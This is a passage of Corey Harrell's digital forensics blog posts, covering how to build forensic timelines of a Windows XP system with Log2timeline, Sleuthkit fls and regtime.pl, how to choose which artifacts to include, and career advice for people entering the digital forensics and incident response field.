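To make the format differences concrete, here is a rough sketch (my own illustration, not any tool's actual code) of converting one Sleuthkit bodyfile line into rows resembling a date/time csv layout. The field order follows the Sleuthkit wiki's v3 bodyfile description, and the sample line is hypothetical:

```python
from datetime import datetime, timezone

def bodyfile_to_rows(line):
    # Sleuthkit v3 bodyfile fields:
    # MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime (times in epoch seconds)
    fields = line.strip().split("|")
    name = fields[1]
    rows = []
    for label, epoch in zip(("atime", "mtime", "ctime", "crtime"), fields[7:11]):
        ts = datetime.fromtimestamp(int(epoch), tz=timezone.utc)
        rows.append({
            "date": ts.strftime("%m/%d/%Y"),
            "time": ts.strftime("%H:%M:%S"),
            "timestamp_type": label,   # which of the four file times this row represents
            "source": "FILE",
            "name": name,
        })
    return rows

# hypothetical bodyfile entry for illustration only
line = ("0|C:/WINDOWS/Prefetch/JAVA.EXE-0C263507.pf|5|r/rrwxrwxrwx|0|0|9540|"
        "1318512000|1318512000|1318512000|1318511990")
for row in bodyfile_to_rows(line):
    print(row["date"], row["time"], row["timestamp_type"], row["name"])
```

Each bodyfile line expands into one timeline row per timestamp, which is essentially what a format conversion has to do before the rows can be merged and sorted with everything else.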

I mostly review timelines with spreadsheet programs so I opted for Log2timeline’s csv format. I use Log2timeline to convert other tools’ outputs into the proper csv schema. My timeline in this post uses the csv format and I demonstrate how to convert between different formats.

Artifact Timestamps

I couldn’t come up with a good name when I was thinking about how to explain the different activities I do when creating timelines. What I mean by artifact timestamps is everything except for the last write times from dumped registry hives and the timestamps from the file system. The different tools to extract timestamps from artifacts include Harlan’s timeline tools and Log2timeline. Harlan accompanies his tools posted on the Win4n6 Yahoo group with a great step-by-step guide about building timelines with them. I cover how to use Log2timeline and the following is a brief explanation of the tool’s syntax:

log2timeline.pl -z timezone -f plugin/plugin_file -r -w output-file-name log_file/log_dir

        -z defines the timezone for the computer where the artifacts came from
        -f specifies the plugin or plugin file to run against the file/directory
        -w specifies the file to write the output to
        -r makes log2timeline work in recursive mode so the folder specified and its subfolders are all examined for artifacts

Options to Extract Timestamps with Single Plugin or Default Plugin File

Log2timeline is plugin based and the tool can execute a single plugin against a single file/directory or execute a plugin file against multiple files in directories. I prefer to use custom plugin files for my timelines but first I wanted to show the single plugin and default plugin file methods. The command below will execute the evt plugin to parse the Windows Security event log and the output will be written to a file named fake-timeline.csv.

log2timeline.pl -z local -f evt -w fake-timeline.csv F:\WINDOWS\system32\config\SecEvent.Evt

The single plugin method requires multiple commands to extract timestamps from different artifacts in a system. Plugin files address the multiple command issue since the file contains a list of plugins to run. Log2timeline comes with a few default plugin files and the one that best fits my selected artifacts is the winxp plugin file. The command below runs the winxp plugin file against the entire mounted forensic image (note the plugin file name and the added -r switch, which differ from the previous command).

log2timeline.pl -z local -f winxp -w fake-timeline.csv -r F:\

The winxp plugin file makes things a lot easier since only one command has to be typed. However, it parses a lot more data than I actually need. The plugins executed are: chrome, evt, exif, ff_bookmark, firefox3, iehistory, iis, mcafee, opera, oxml, pdf, prefetch, recycler, restore, setupapi, sol, win_link, xpfirewall, wmiprov, ntuser, software, and system. I only wanted to parse IE history but winxp covers every browser supported by Log2timeline. I only wanted to parse artifacts in the administrator’s user profile but the above command parses artifacts from every profile on the system. I wanted to limit my timeline to specific artifacts but winxp is giving me everything. Not exactly what I’m looking for.

Single plugins and default plugin files are viable methods for building timelines. However, neither lets me easily build a timeline containing only my selected artifacts tailored to the case and system I’m processing. This is where custom plugin files come into play and why I use them instead.

Extracting Timestamps for my Timeline with Custom Plugin Files

Kristinn deserves all the credit for why I know about the ability to create custom plugin files. I’m just the guy who asked him the question and decided to blog the answer he gave me. A custom plugin file is a text file that lists one plugin per line and is saved with the .lst file extension. The picture below shows a custom file named test.lst which contains plugins for prefetch files, event logs, and system restore points.

Custom Plugin File Example

The custom file is placed in the same directory where the default plugin files are located. On a Windows system with Log2timeline 0.60 installed the directory is C:\Perl\lib\Log2t\input\.

I only want to parse artifacts in the administrator user profile instead of all user profiles stored on the system. At the time I wrote this post, Log2timeline doesn’t have the ability to exclude full paths (such as unwanted user profiles) when running in recursive mode. As a result I create two custom plugin files; one file parses the artifacts in a user profile while the other parses the remaining artifacts throughout the system. This lets me control what user profiles to extract timestamps from since I can run the user plugin file against the exact ones I need.

The user custom plugin file is named custom_user.lst and contains the iehistory and ntuser plugins. The other custom plugin file is named custom_system.lst and contains the evt, xpfirewall, prefetch, and restore plugins. The two commands below execute the custom_user.lst against the administrator’s user account profile and custom_system.lst against the entire drive while saving the output to the file timeline.csv.

log2timeline.pl -z local -f custom_user -w C:\win-xp\timeline.csv -r "F:\Documents and Settings\Administrator"

log2timeline.pl -z local -f custom_system -w C:\win-xp\timeline.csv -r F:\

The commands extracted the timestamps from all of the artifacts on my list except for the entire registry hives’ last write times and the file system timestamps. The picture shows the timeline built so far. The timeline is sorted and the section shown is where the prefetch file I referenced in the post What’s a Timeline is located.

Timeline Data Added by Custom Plugin File
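Since a custom plugin file is just one plugin name per line saved with a .lst extension, generating them can be scripted. This sketch is my own illustration (not part of Log2timeline) and writes the two plugin files described above into a stand-in directory:

```python
from pathlib import Path

# plugin lists taken from the post's custom_user.lst and custom_system.lst
plugin_files = {
    "custom_user.lst": ["iehistory", "ntuser"],
    "custom_system.lst": ["evt", "xpfirewall", "prefetch", "restore"],
}

# stand-in for Log2timeline's input directory (C:\Perl\lib\Log2t\input\ on Windows)
out_dir = Path("log2t_input")
out_dir.mkdir(exist_ok=True)

for filename, plugins in plugin_files.items():
    # one plugin per line, saved with the .lst extension
    (out_dir / filename).write_text("\n".join(plugins) + "\n")

print((out_dir / "custom_user.lst").read_text())
```

Scripting the files is handy when you keep per-case artifact lists and want to regenerate matching plugin files instead of editing them by hand.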

Filesystem Timestamps

This activity adds file and directory timestamps to the timeline. There are different tools that extract this information, including FTK Imager, AnalyzeMFT, Log2timeline, and the Sleuthkit. I’m demonstrating two different methods to add the data to my timeline to show the differences between them. The first method uses the Sleuthkit together with Log2timeline while the second method only uses Log2timeline.

The fls.exe program in the Sleuthkit will list the files and directories in an image. The command below creates a bodyfile containing the files/directories’ activity in the test forensic image and stores the output in the file named fls-bodyfile.txt. (the -m switch makes the output format mactime, -r is for recursive mode, and -o is the sector offset where the filesystem starts)

fls.exe -m C: -r -o 63 C:\images\image.dd >> C:\win-xp\fls-bodyfile.txt

Fls.exe’s output is in the bodyfile format but my timeline is in Log2timeline’s csv format. Log2timeline has plugins to parse output files in the TLN and bodyfile formats. This means the tool can be used to convert one format into another. The command below parses the fls-bodyfile.txt file and adds the data to my timeline.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\fls-bodyfile.txt

The picture highlights the new entries to the section of my timeline. Doesn’t the story about what occurred become clearer?

Timeline Data Added by fls.exe

The file system in the Windows XP test system is NTFS. NTFS stores two sets of timestamps: the $FILE_NAME attribute timestamps and the $STANDARD_INFORMATION attribute timestamps. Fls.exe, along with the majority of other forensic tools, shows the $STANDARD_INFORMATION timestamps. However, there may be times when it’s important to include both sets of timestamps in a timeline. One such occurrence is when there’s a concern that timestamps might have been altered. Parsing the Master File Table ($MFT) can add both sets of timestamps to a timeline. The command below shows Log2timeline parsing the $MFT and adding the output to the file timeline-copy.csv.

log2timeline.pl -z local -f mft -w timeline-copy.csv F:\$MFT

The picture below highlights the new entries for the data extracted from the $MFT. Notice the difference between the timeline only containing the $STANDARD_INFORMATION timestamps compared to containing both timestamps. Quick side note: the mft plugin could be added to a custom plugin file.

Timeline Data Added by $MFT
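One way to put both sets of timestamps to work is to compare them automatically. The sketch below is my own illustration with made-up epoch values: it flags fields where the $STANDARD_INFORMATION time predates the $FILE_NAME time, a possible (though not conclusive) sign of alteration, since many timestamp-altering tools only rewrite the $STANDARD_INFORMATION attribute:

```python
def flag_suspect_times(si, fn):
    """Compare $STANDARD_INFORMATION (si) and $FILE_NAME (fn) timestamp dicts
    of epoch seconds; return the fields where $SI is earlier than $FN."""
    return {k: (si[k], fn[k]) for k in si if k in fn and si[k] < fn[k]}

# hypothetical $MFT entry: $SI times set years before the $FN times
si = {"mtime": 1100000000, "crtime": 1100000000}
fn = {"mtime": 1318512000, "crtime": 1318512000}
print(flag_suspect_times(si, fn))
```

A hit from a check like this is only a lead; legitimate operations can also produce mismatched timestamps, so the surrounding timeline context still has to be examined.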

Registry Timestamps

In the artifact timestamps section Log2timeline extracted data from select registry keys. However, there are times when I want all registry keys’ last write times from registry hives. So far I want this ability when dealing with malware infections since it helps identify the persistence mechanism and registry modifications. The tools to extract the last write times from registry hives include Harlan’s regtime.pl script (I obtained it from the Sift 2.0 workstation) and Log2timeline. For my timeline I’m interested in the System, Software, and administrator’s NTUSER.DAT registry hives. The commands below have regtime.pl extracting the last write times from each hive and storing them in the bodyfile file named reg-bodyfile.txt (the -m switch prepends text to each line and the -r switch is the path to the registry hive).

regtime.pl -m HKLM/system -r F:\WINDOWS\system32\config\system >> C:\win-xp\reg-bodyfile.txt

regtime.pl -m HKLM/software -r F:\WINDOWS\system32\config\software >> C:\win-xp\reg-bodyfile.txt

regtime.pl -m HKCU/Administrator -r "F:\Documents and Settings\Administrator\NTUSER.DAT" >> C:\win-xp\reg-bodyfile.txt

Regtime.pl’s output is in the bodyfile format so Log2timeline makes the format conversion as shown in the command below.

log2timeline.pl -z local -f mactime -w C:\win-xp\timeline.csv C:\win-xp\reg-bodyfile.txt

The picture highlights the new data added to the timeline by regtime.pl. The timeline now highlights the malware’s persistence mechanisms (Run and Services registry keys).

Timeline Data with Registry Keys' Last Write Times

Sorting the Timeline

When new data is added to a timeline it’s placed at the end of the file, which means the timeline needs to be sorted prior to viewing it. There are different sorting options, such as the mactime.exe program in the Sleuthkit for bodyfile format timelines. A quick method I use is my spreadsheet program’s sort feature. The settings below will make Excel sort from the oldest time to the most recent.

Excel 2007 Sort Feature
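Excel is not the only option; the same sort can be scripted. This sketch assumes a csv timeline with separate date and time columns (as in Log2timeline's 0.6x csv schema) and rewrites the file in chronological order, oldest to most recent:

```python
import csv
from datetime import datetime

def sort_timeline(in_path, out_path):
    # read the unsorted timeline into memory
    with open(in_path, newline="") as f:
        reader = csv.DictReader(f)
        fieldnames = reader.fieldnames
        rows = list(reader)
    # sort oldest to most recent, mirroring the Excel settings in the post
    rows.sort(key=lambda r: datetime.strptime(
        r["date"] + " " + r["time"], "%m/%d/%Y %H:%M:%S"))
    # write the sorted rows back out with the same columns
    with open(out_path, "w", newline="") as f:
        writer = csv.DictWriter(f, fieldnames=fieldnames)
        writer.writeheader()
        writer.writerows(rows)
```

Scripting the sort means newly appended tool output can be re-sorted in one step without reopening the spreadsheet each time.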

Summary

The approach described in my Building Timeline series is just one way out of many to create timelines. The DFIR community has provided a wealth of information on the topic. Look at the following examples which are only a drop in the bucket of knowledge. Harlan Carvey created and released tools for creating timelines in addition to regularly posting on his blog (a few posts are HowTo: Creating Mini-Timelines and A Bit More About Timelines...). Kristinn Gudjonsson is very similar in that he created and released log2timeline in addition to providing information on his websites (a few posts are Timeline Analysis 101 and Timeline Analysis 201 – review the timeline). Rob Lee has shared his approach in the way he builds timelines and two of his posts are SUPER Timeline Analysis and Creation and Shadow Timelines And Other VolumeShadowCopy Digital Forensics Techniques with the Sleuthkit. Chris Pogue has shared his method to create timelines on his blog and a few posts are Log2Timeline and Super Timelines and Time Stomping is for Suckers. The last author I’ll directly mention is Don Weber who released his scripts for creating timelines and blogged about creating timelines (one post is Hydraq Details Revealed Via Timeline Analysis). These are only a few tools, blog posts, and authors who have taken the time to share their thoughts on timeline analysis. To see more try the keyword “timeline” in the Digital Forensic Search to see what’s out there.

For anyone looking to become more proficient at timeline analysis, I recommend doing what I did. Read everything you can find on the topic, download and test the different tools people talk about, and try out different approaches to see how the resulting timelines differ. It won’t only teach you about timeline analysis but will help identify what method and tools work best for you.

Building Timelines – Thought Process Behind It

Saturday, September 17, 2011 Posted by Corey Harrell 0 comments
Timelines are a valuable technique to have at your disposal when processing a case. They can reveal activity on a system that may not be readily apparent or show the lack of certain activity, helping rule theories out. Timelines can be used on cases ranging from human resource policy violations to financial investigations to malware infections to even auditing. Before the technique can be used one must first know how to build timelines.

This is the first post in my two part series on building timelines. Part 1 discusses the thought process behind building timelines while Part 2 demonstrates different tools and methods to build them.

Things to Consider

There are two well known approaches to building timelines. On one end is the minimalist approach: only include the exact data needed. On the other end is the kitchen sink approach: include all the data that is available. My approach falls somewhere in the middle. I put the data I definitely need into timelines along with some data I think I may need. The things I take into consideration when selecting data are:

        - Examination’s Purpose
        - Identify Data Needed
        - Understand Tools’ Capabilities
        - Tailor Data List to System

Examination’s Purpose

The first thing I consider when building timelines is the examination’s purpose. Every case should have a specific purpose or purposes the DF analyst needs to accomplish. For example: did an employee violate an acceptable usage policy, how was a system infected, how long was a web server compromised, or where are all the Word documents on a hard drive?

Identify Data Needed

The next area to consider is what data is needed to accomplish the purpose(s). This is where I make a judgment about the artifacts I think will contain relevant information and the artifacts that could contain information of interest. A few potential data sources and their artifacts are:

        - Hard drives: file system, web browsing history, registry hives, Windows short cut files, firewall logs, restore points, volume shadow copies, prefetch files, email files, or Office documents

        - Memory: network connections, processes, loaded dlls, or loaded drivers

        - Network shares: email files (including archives), office documents, or PDFs

        - Network logs: firewall logs, IDS logs, proxy server logs, web server logs, print/file server logs, or authentication server logs

I take into account the case type and examination's purpose(s) when picking the artifacts I want. To illustrate the effect case type has on my choice I'll use a malware infected system and an Internet usage policy violation as examples. For the malware infected system I'd definitely be interested in the artifacts showing program execution, firewall logs, antivirus logs, and file system metadata. The additional items I'd throw into a timeline would be the user's web browsing history, removable media usage, and registry keys' last write times since those artifacts might show information about the initial infection vector and persistence mechanism. For an Internet usage policy violation I'd only include the file system metadata and web browsing history since my initial interest is limited to the person's web browsing activities.

The examination purpose(s) will point to other artifacts of interest. Let's say the Internet usage policy violation's purpose was to determine if an employee was surfing pornographic websites and saving pornographic images to a company issued thumb drive. In addition to file system metadata and web history, I'd now want to include artifacts showing recent user activity such as Windows shortcut files or the userassist registry key.

I try to find a balance between the data I know I'll need and the data that may contain relevant information. I don't want to put everything into the timeline (kitchen sink approach) but I'm trying to avoid frequently adding more data to the timeline (minimalist approach). Finding a balance between the two lets me create one main timeline with the ability to create mini timelines using spreadsheet filters. Making the call about what data to select is not going to be perfect initially. Some data may not contain any information related to the examination while other left out data is going to be important. The important thing to remember is building timelines is a process. Data can be added or removed at later times which means thinking about data to incorporate into a timeline should occur continuously. This is especially true as more things are learned while processing the case.
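The spreadsheet-filter idea above can also be expressed in code. A minimal sketch (the column names and sample entries are my own assumptions, not from any specific tool) that pulls a mini timeline out of the main one by artifact source:

```python
def mini_timeline(rows, sources):
    # keep only the entries whose source matches the artifacts of interest
    return [row for row in rows if row["source"] in sources]

# hypothetical timeline entries for illustration
timeline = [
    {"date": "10/13/2011", "source": "WEBHIST", "desc": "visited 192.168.11.200"},
    {"date": "10/13/2011", "source": "FILE", "desc": "jar_cache tmp file created"},
    {"date": "10/13/2011", "source": "REG", "desc": "Run key last write updated"},
]

# mini timeline of just web history and registry activity
for row in mini_timeline(timeline, {"WEBHIST", "REG"}):
    print(row["date"], row["source"], row["desc"])
```

Filtering this way keeps one main timeline as the single source of truth while still letting you focus on one artifact type at a time.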

Understand Tools’ Capabilities

After the examination’s purpose(s) are understood and the potential data required to accomplish them is identified, the next consideration is understanding my tools’ capabilities. Timeline tools provide different support for the artifacts they can parse. I review the items I want to put into my timeline against the artifacts supported by my tools to identify what in my list can’t be parsed. If any items are not supported then I decide if the item is really needed and whether a different tool will work. Another benefit to making this comparison is that it helps to identify artifacts I might not have thought about. The picture below shows some artifacts supported by the tools I’ll discuss in the post Building Timelines – Tools Usage.


Some may be wondering why I don’t think about the tools’ capabilities before I consider the data I need to accomplish the examination’s purpose(s). My reason is that I don’t want to restrict myself to the capability provided by my tools. For example, none of my commercial tools are able to create the timelines I’m talking about. If I based my decision on how to accomplish what I need to do solely on my commercial tools then timelines wouldn’t even be an option. I’d rather first identify the data I want to examine and then determine if my tools can parse it. This helps me see the shortcomings in my tools and lets me find other tools to get the job done.

Tailor Data List to System

At this point in the thought process potential data has been identified to put into a timeline. A timeline could be built now even though the artifact list is pretty broad. My preference is to tailor the list to the system under examination. To see what I mean I’ll discuss a common occurrence I encounter when building timelines, which is including a user account’s web browser history. Based on my tools’ supported artifacts, the web browsing artifacts could be from: Google Chrome, Firefox 2, Firefox 3, Internet Explorer, Opera, or Safari. Is it really necessary to have my tools search for all these artifacts? If the system only has Internet Explorer (IE) installed then why spend time looking for the other items? If the same system has 12 loaded user profiles but the examination is only looking at one user account then why parse the IE history for all 12 user profiles? To minimize the time building timelines and reduce the amount of data in them, the artifact list needs to be tailored to the system. A few examination checks will be enough to narrow down the list. The exact checks will vary by case but one step that holds across all cases is obtaining information about the operating system (OS) and its configuration.

I previously discussed this examination step in the post Obtaining Information about the Operating System and it covers the three different information categories impacting the artifact list. The first category is the General Operating System Information and it shows the operating system version. The version will dictate whether certain artifacts are actually on the system since some are OS specific. The second category is the User Account Information which shows the user accounts (local accounts as well as accounts that logged on) associated with the system. When building a timeline it’s important to narrow the focus to the user accounts under examination; this is even more so on computers shared by multiple people. Identifying the user accounts can be done by confirming the account assigned to a person, looking at the user account names, or looking at when the user accounts were last used. The third and final category is the Software Information. This category shows information about programs installed and executed on the system. The software on a system will dictate what artifacts are present. A quick review of the artifacts supported by my tools (picture above) shows how many are associated with specific applications. This one examination step can take a broad list and make it more focused to the environment where the artifacts are coming from.

Select Data for the Timeline

I reflect on the things I considered when coming up with a plan on how to build the timeline. The examination's purpose outlined what I need to accomplish, potential data I want to examine was identified, my tools' capabilities were reviewed to see what artifacts can be parsed, and then checks were made to tailor the artifact list to the system I’m looking at. The list I’m left with afterwards is what gets incorporated into my first timeline. Working my way through this thought process reduces the number of artifacts going into a timeline, thus reducing the amount of data I’ll need to weed through.

Thought Process Example

The thought process I described may appear to be pretty extensive but that is really not the case. The length is because I wanted to do a good job explaining it since I feel it’s important. The process only takes a little time to complete and most of it is already done when processing a case. Follow along with a DF analyst on a hypothetical case to see how the thought process works in coming up with a plan to build the timeline. Please note, the case only mentions a few artifacts to get my point across but an actual case may use more.

Friend: “Damn … Some program keeps saying I’m infected and won’t go away. Let me call the DF analyst since he does something with computers for a living. He can fix it.”

Phone rings and DF analyst picks up

Friend: “DF analyst … Some program keeps saying I’m infected with viruses and blocks me from doing anything.”

DF analyst: “Do you have any security programs installed such as antivirus software, and if so is that what you’re seeing?”

Friend: “I think I have Norton installed but I’ve never seen this program before. Wait … hold on … Oh man, now pornographic sites are popping up on my screen.”

DF analyst: “Yup, sounds like you’re infected.”

Friend: “I know I’m infected. That’s what I told you this program has been telling me.”

DF analyst: “Umm … The program saying you are infected is actually the virus.”

Friend: “Hmmmm….”

DF analyst: “Just power down the computer and I’ll take a look at it later today.”

Computer powering down

DF analyst: “When did you start noticing the program?”

Friend: “Today when I was using the computer.”

DF analyst: “What were you doing?”

Friend: “Stuff… Surfing the web, checking email, and working on some documents. I really need my computer. Can you just get rid of the virus and let me know if my wife or kids did this to my computer?”

Later that day

DF analyst has the system back in the lab. He thinks about what he needs to do which is to remove the malware from the system and determine how it got there. The potential data list he came up with to accomplish those tasks was: known malware files, system’s autostart locations, programs executed (prefetch, userassist, and muicache), file system metadata, registry hives, event logs, web browser history, AV logs, and restore points/volume shadow copies.

Wanting to know what launches when his friend logs onto the computer, the DF analyst uses the Sysinternals Autoruns utility in offline mode to find out. Sitting in one Run key was an executable with a folder path pointing to his friend’s user profile. A Google search using the file’s MD5 hash confirmed the file was malicious and his friend’s system was infected. The DF analyst decided to leverage a timeline to see what else was dropped onto the system and what caused it to get dropped in the first place.

DF analyst pulls out his reference showing the various artifacts supported by his timeline tools. He confirms that all the potential data he identified is supported. Then he moves on to his first examination step, which is examining the hard drive’s layout. Two partitions: one is the Dell recovery partition formatted with FAT32 while the other holds the operating system formatted with NTFS. The DF analyst just added NTFS artifacts ($MFT) to his potential data list. To get a better idea about the system he uses RegRipper to rip out the general operating system information. Things he learned from the RegRipper reports and the decisions he made based on the information:

         - OS version is XP (restore points are in play while shadow copies are out. Need to parse event logs with evt file extensions)

        - Three user accounts were used in the past week (initial focus for certain artifacts will be from friend’s user account since malware was located there. The two other user accounts may be analyzed depending on what the file system metadata shows)

        - Internet Explorer was only web browser installed (all other web browser artifacts won’t be parsed at this time)

        - Kaspersky antivirus software was installed (tools don’t support this log format. AV log will be reviewed and entries will be put into the timeline manually)

DF analyst performs a few other checks. The Prefetch folder has files in it and his friend’s user account recycle bin has numerous files in it. Both were added to the timeline artifact list. The final list contains items from the system and one user account. The system data has: prefetch files, event logs (evt), system restore points, and the Master File Table. The artifacts from one user account are: userassist registry key, muicache registry key, IE history, and the Recycle Bin contents. DF analyst is ready to build his timeline …. Stay tuned for the post "Building Timelines – Tools Usage" to see one possible way to do it.


I'd like to hear feedback about how others approach building timelines; especially if it's different from what I wrote. It's helpful to see how other analysts are building timelines.

Linkz 4 Advice

Monday, September 12, 2011 Posted by Corey Harrell 2 comments
There won’t be any links pointing to Dr. Phil, Dear Abby, or Aunt Cleo. Not that there’s anything wrong with that… They just don’t provide advice on a career in DFIR.

Getting Started in DFIR

Harlan put together the post Getting Started, which contains great advice for people looking to get into DF. I think his advice even applies to folks already working in the field. DF is huge, with a lot of areas for specialization. Harlan’s first tip was to pick something and start there. How true is that advice for us, since we aren’t Abby from NCIS (a forensic expert in everything)? People have their expertise: Windows, Macs, cell phones, Linux, etc., but there is always room to expand our knowledge and skills. The best way to expand into other DF areas is to “pick something and start there”.

Another tip is to have a passion for the work we do. In Harlan’s words, “in this industry, you can't sit back and wait for stuff to come to you...you have to go after it”. I completely agree with this statement, and DF is not the field to get complacent in. There needs to be a drive deep down inside to continuously improve your knowledge and skills. For example, it would be easy to grow complacent and maintain knowledge only about the Windows XP operating system if that’s the technology normally faced. However, that would ignore the fact that at some point in the near future encounters with Windows 7 boxes and non-Windows systems will be the norm. A passion for DF is needed to push yourself to learn and improve your skills on your own without someone (i.e. an employer) telling you what you should be doing.

I wanted to touch on those two tips, but the entire post is well worth the read, regardless of whether you are looking to get into DF or have already arrived.

Speaking about a Passion

Little Mac over at the Forensicaliente blog shared his thoughts about needing a drive to succeed in DF. I’m not musically inclined but he uses a good analogy to explain what it takes to be successful. Check out his post Is Scottish Fiddle like Digital Forensics?.

Breaking into the Field

Lenny Zeltser discussed How to Get Into Digital Forensics or Security Incident Response on his blog last month. One issue facing people looking to break into the field is that organizations may not be willing to spend the time and resources to train someone new to it. Lenny suggested people should leverage their current positions to acquire relevant DFIR skills.

Lenny’s advice doesn’t apply to how I broke into the field, since DFIR was basically dropped into my lap when I was tasked with developing the DF capability for my organization. However, his advice is spot on for how I was able to land my first position in the information security field (which is what led me into DFIR). I was first exposed to security during my undergraduate studies when I took a few courses on the topic. It was intriguing, but the reality was there weren’t a lot of security jobs in my area, which meant my destination was still IT operations. I continued down the track pushing me further into IT, but I always kept my desire for security work in mind. After graduation I took a position in an IT shop where I had a range of responsibilities, including networking and server administration. In this role, I wanted to learn how to secure the technology I was responsible for managing and what techniques to use to test security controls. This was due diligence as a system admin, but it also allowed me to gain knowledge and some skills in the security field. In addition to operational security, I even tried to push an initiative to develop and establish an information security policy. Unfortunately, the initiative failed, and it was my first lesson that nothing will be successful without management’s support. All was not lost, because the experience and my research taught me a lot about security being a process that supports the business. This is a key concept about security, and up until that point my focus had been on security's technical aspects.

I leveraged the position I was in to acquire knowledge and skills in my chosen field (security). My actions weren’t completely self-serving, since my employer benefited from having someone to help secure their network. I didn’t realize how valuable it was to expand my knowledge and skills until my first security job interview. Going in I thought I lacked the skills and knowledge, but over the course of the interview I realized I had a lot more to offer. I took the initiative to expand my skillset, and it was an important factor in helping me land in the security field. My experience is very similar to Lenny’s advice, except his post is about getting into the DFIR field.

Get a plan before going into the weeds

Rounding out the links providing sound guidance, Bill over at the Unchained Forensics blog gave some good advice in his recent post Explosions Explosions. He shared his thoughts on how he approaches examinations. One comment he made that I wanted to highlight was “more and more of my most efficient time is being used at the case planning stage”. He mentions how he thinks about his plan to tackle the case, including identifying potential data of interest, before he even starts his examination. I think it’s a great point to keep reinforcing for people new and old to DFIR.

I remember when I was new to the field. I had a newly established process and skillset, but I lacked certain wisdom in how to approach cases. As expected, I went above and beyond in examining my first few cases. I even thought I was able to do some “cool stuff” the person requesting DF assistance would be interested in. There was one small issue I overlooked. The person was only interested in the content of specific data, while I went beyond that, way beyond that. I wasted time, and the cool stuff I thought I did was never even used. I learned two things from the experience. The first was to make sure I understand what I’m being asked to do, even if it means asking follow-up questions or educating the requestor about DF. The second lesson was to think about what I’m going to do before I do it. What data do I need? What steps in my procedures should I complete? What procedural steps can be omitted? What’s my measure of success that tells me the examination is complete? Taking the time beforehand to gather your thoughts and develop a plan helps keep the examination focused on the customer’s needs while limiting the “cool stuff” that’s not even needed.

Books On demand

If someone were to ask me what is the best training I have ever taken, I know exactly what I would say: a book, a computer, Google, and time. That’s it, and the cost is pretty minimal since only a book needs to be purchased. I’m not knocking training courses, but classes cannot compare to educating yourself through reading, researching, and testing. I never heard about Books24x7 until I started working for my current employer. Books24x7 is a virtual library providing access to “in-class books, book summaries, research reports and best practices”. The books in my subscription cover topics including: security, DFIR, certification, business, programming, operating systems, networking, and databases. I can find the information I’m looking for by searching numerous books whether I’m researching, testing, or working. A quick search for DFIR books located: Malware Forensics: Investigating and Analyzing Malicious Code, Windows Registry Forensics: Advanced Digital Forensic Analysis of the Windows Registry, Windows Forensic Analysis Toolkit Second Edition, Malware Analyst's Cookbook: Tools and Techniques for Fighting Malicious Code, EnCase Computer Forensics: The Official EnCE: EnCase Certified Examiner Study Guide, and UNIX and Linux Forensic Analysis Toolkit. That’s only a few books from the pages and pages of search results for DFIR. Talk about a wealth of information at your fingertips.

The cost may be a little steep for an individual but it might be more reasonable for an organization. If an organization’s employees have a passion for their work and take the initiative to acquire new skills then Books24x7 could be an option as a training expense. Plus, it could save money from not having to purchase technical books for staff. Please note, I don’t benefit in any way by mentioning this service on my blog. I wanted to share the site since it’s been a valuable resource when I’m doing my job or self training to learn more about DFIR and security.